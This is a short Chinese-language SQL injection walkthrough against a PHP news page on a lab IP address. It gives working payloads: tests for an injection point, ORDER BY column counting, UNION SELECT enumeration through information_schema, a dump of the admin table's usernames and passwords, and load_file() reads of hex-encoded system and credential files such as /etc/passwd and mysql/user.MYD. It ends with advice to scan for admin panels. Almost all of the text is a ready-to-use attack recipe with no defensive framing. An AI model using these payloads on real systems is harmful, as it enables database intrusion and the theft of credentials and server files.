1.首先确定是否存在注入点
http://192.168.16.128/news.php?id=1
http://192.168.16.128/news.php?id=1' 出错或显示不正常
http://192.168.16.128/news.php?id=1 and 1=1 正常
http://192.168.16.128/news.php?id=1 and 1=2 出错或显示不正常
如果有出错,说明存在注入点。
2.确定字段长度。
http://192.168.16.128/news.php?id=1 and 1=1 order by 8 正常
http://192.168.16.128/news.php?id=1 and 1=1 order by 10 出错
说明字段长度为9
3.猜字段
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9
发现页面文章处出现4,7,9,于是在4,7,9上填入SQL语句
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
对于5.0以上的版本可以使用information_schema来爆数据库
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8,9
from information_schema.tables where table_schema=database()
假如存在admin表
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9
from information_schema.columns where table_name=0x61646D696E
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(username,0x40,password),5,6,7,8,9
from admin
4.进一步利用load_file()
http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,load_file(0x633A5C626F6F742E696E69),5,6,7,8,9
load_file(0x633A5C626F6F742E696E69) c:\boot.ini
load_file(0x633A5C77696E646F77735C6D792E696E69) c:\windows\my.ini
load_file(0x633A5C77696E646F77735C7068702E696E69) c:\windows\php.ini
load_file(0x6D7973716C2F757365722E4D5944) mysql/user.MYD 跨表查询数据库密码
load_file(0x2F6574632F706173737764) /etc/passwd
0x2F6574632F68747470642F636F6E662F68747470642E636F6E66 /etc/httpd/conf/httpd.conf
load_file(0x2F6574632F7068702E696E69) /etc/php.ini
0x2F6574632F706870352F617061636865322F7068702E696E69 /etc/php5/apache2/php.ini
load_file(0x2F6574632F6D792E696E69) /etc/my.ini
5.使用wwwscan扫描网站后台
主要目标:找后台以及phpmyadmin等